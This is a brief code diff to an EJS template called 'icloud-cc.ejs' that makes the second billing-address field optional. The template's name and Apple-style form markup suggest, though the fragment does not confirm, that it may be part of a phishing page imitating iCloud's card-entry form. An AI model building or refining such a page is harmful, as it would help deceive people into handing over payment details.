--- a/views/icloud-cc.ejs
+++ b/views/icloud-cc.ejs
@@ -13558,7 +13558,7 @@
 
                                                         <div class="form-cell">
                                                             <div class=" form-cell-wrapper ">
-                                                                <input type="text" required name="address2"
+                                                                <input type="text" name="address2"
                                                                     class="force-ltr form-textbox form-textbox-text"
                                                                     aria-invalid="false" autofocus=""
                                                                     data-focus-method="mouse" id="billing_address"
